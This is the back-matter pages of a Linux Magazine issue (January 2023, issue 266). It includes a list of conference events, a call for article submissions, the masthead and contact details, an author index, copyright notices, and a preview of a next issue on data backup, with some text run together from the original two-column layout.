Europe 2023

Cloud Expo Europe May 10-11 FrankfurtFrankfurt, Germany https://www.cloudexpoeurope.de/en

ISC High Performance May 21-25 Hamburg, Germany https://www.isc-hpc.com/about-overview.html

DrupalCon Pittsburgh June 5-8 Pittsburgh, Pennsylvania https://events.drupal.org/pittsburgh2023

96 JANUARY 2023 ISSUE 266 LINUX-MAGAZINE.COM

 SERVICE
Contact Info / Authors

CALL FOR PAPERS

We are always looking for good articles on Linux and the The technical level of the article should be consistent with
tools of the Linux environment. Although we will consider what you normally read in Linux Magazine. Remember
any topic, the following themes are of special interest: that Linux Magazine is read in many countries, and your
• System administration article may be translated into one of our sister publica-
tions. Therefore, it is best to avoid using slang and idioms
• Useful tips and tools
that might not be understood by all readers.
• Security, both news and techniques
Be careful when referring to dates or events in the future.
• Product reviews, especially from real-world experience
Many weeks could pass between your manuscript sub-
• Community news and projects mission and the final copy reaching the reader’s hands.
If you have an idea, send a proposal with an outline, an esti- When submitting proposals or manuscripts, please use a
mate of the length, a description of your background, and subject line in your email message that helps us identify
contact information to [email protected]. your message as an article proposal. Screenshots and
other supporting materials are always welcome.
Additional information is available at:
http://www.linux-magazine.com/contact/write_for_us.

Contact Info
Editor in Chief While every care has been taken in the content of
Joe Casad, [email protected] the magazine, the publishers cannot be held respon-
Copy Editors sible for the accuracy of the information contained
Amy Pettle, Aubrey Vaughn within it or any consequences arising from the use of
News Editors it. The use of the disc provided with the magazine or
Jack Wallen, Amber Ankerholz any material provided on it is at your own risk.
Editor Emerita Nomadica Copyright and Trademarks © 2022 Linux New
Rita L Sooby
Media USA, LLC.
Authors Managing Editor
Lori White No material may be reproduced in any form what-
Bernhard Bablok 70 soever in whole or in part without the written per-
Localization & Translation
Erik Bärwaldt 23, 46, 78 Ian Travis mission of the publishers. It is assumed that all cor-
respondence sent, for example, letters, email,
Layout
Zack Brown 12 faxes, photographs, articles, drawings, are sup-
Dena Friesen, Lori White
Bruce Byfield 6, 20, 34, 58 plied for publication or license to third parties on
Cover Design
Dena Friesen a non-exclusive worldwide basis by Linux New
Joe Casad 3 Media USA, LLC, unless otherwise stated in writing.
Cover Image
John Cofield 92 © Aliaksandr Marko, 123RF.com Linux is a trademark of Linus Torvalds.
Mark Crutch 75 Advertising All brand or product names are trademarks
Brian Osborn, [email protected]
of their respective owners. Contact us if we
Jim Hall 37 phone +49 8093 7679420
haven’t credited your copyright; we will always
Jon “maddog” Hall 76 Marketing Communications
correct any oversight.
Gwen Clark, [email protected]
Thomas Leichtenstern 82 Linux New Media USA, LLC Printed in Nuremberg, Germany by Zeitfracht GmbH.
4840 Bob Billings Parkway, Ste 104 Distributed by Seymour Distribution Ltd, United
Vincent Mealing 75 Lawrence, KS 66049 USA
Kingdom
Graham Morrison 86 Publisher
Brian Osborn Represented in Europe and other territories by:
Mike Schilli 50 Sparkhaus Media GmbH, Bialasstr. 1a, 85625
Customer Service / Subscription
For USA and Canada: Glonn, Germany.
Carina Schipper 16
Email: [email protected] Published monthly as Linux Magazine (Print
Scott Sumner 62 Phone: 1-866-247-2802 ISSN: 1471-5678, Online ISSN: 2833-3950) by
(Toll Free from the US and Canada)
Ferdinand Thommes 40 Linux New Media USA, LLC, 4840 Bob Billings
For all other countries: Parkway, Ste 104, Lawrence, KS 66049, USA. Pe-
Jack Wallen 8 Email: [email protected] riodicals Postage paid at Lawrence, KS and addi-
Franciszek Pokryszko 30 www.linux-magazine.com tional mailing offices. Ride-Along Enclosed.

LINUX-MAGAZINE.COM ISSUE 266 JANUARY 2023 97

NEXT MONTH
Issue 267 Approximate
UK / Europe Jan 07
USA / Canada Feb 03
Australia Mar 06
Issue 267 / February 2023
On Sale Date

Sync and Please note: On sale dates are

approximate and may be delayed
because of logistical issues.

Backup
All the security in the world won’t help if your hard drive
crashes. Or what if ransomware puts a lock on your
disk? Do you really have to pay? With all the changes in
the computer industry through the years, one important
rule remains the unchanged: Back up your data!

Preview Newsletter
The Linux Magazine Preview is a monthly email
newsletter that gives you a sneak peek at the next
issue, including links to articles posted online.
Sign up at: https://bit.ly/Linux-Update
Image © Timofeev Vladimir, 123RF.com

98 JANUARY 2023 ISSUE 266 LINUX-MAGAZINE.COM